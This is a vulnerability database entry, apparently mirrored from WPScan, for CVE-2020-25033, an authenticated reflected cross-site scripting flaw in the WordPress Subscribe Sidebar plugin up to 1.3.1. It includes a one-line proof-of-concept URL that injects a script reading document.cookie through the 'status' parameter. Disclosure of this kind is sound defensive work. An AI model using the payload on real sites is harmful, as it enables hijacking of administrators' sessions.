Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbWpvulndbWPVDB-ID:FBCCE3FD-E31E-4917-90E1-4F2621847C68
HistoryAug 31, 2020 - 12:00 a.m.

Subscribe Sidebar <= 1.3.1 - Authenticated Reflected Cross-Site Scripting

2020-08-3100:00:00
wpscan.com
4

0.001 Low

EPSS

Percentile

29.5%

JSON

The ‘status’ GET parameter in subscribe_sidebar.php, which is displayed in the plugin’s option page, is vulnerable to reflected XSS attacks.

PoC

/wp-admin/options-general.php?page=subscribe_sidebar.php&status;=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

CPENameOperatorVersion
subscribe-sidebareq*

Related

nvd 1
cve 1
wpexploit 1
cvelist 1
patchstack 1
prion 1
nvd
nvd
CVE-2020-25033
2020-08-31 05:15:11
cve
cve
CVE-2020-25033
2020-08-31 05:15:11
wpexploit
wpexploit
Subscribe Sidebar <= 1.3.1 - Authenticated Reflected Cross-Site Scripting
2020-08-31 00:00:00
cvelist
cvelist
CVE-2020-25033
2020-08-31 04:06:14
patchstack
patchstack
WordPress Subscribe Sidebar plugin <= 1.3.1 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerability
2020-08-31 00:00:00
prion
prion
Cross site scripting
2020-08-31 05:15:00

0.001 Low

EPSS

Percentile

29.5%

JSON
Related for WPVDB-ID:FBCCE3FD-E31E-4917-90E1-4F2621847C68
nvd1cve1wpexploit1cvelist1patchstack1prion1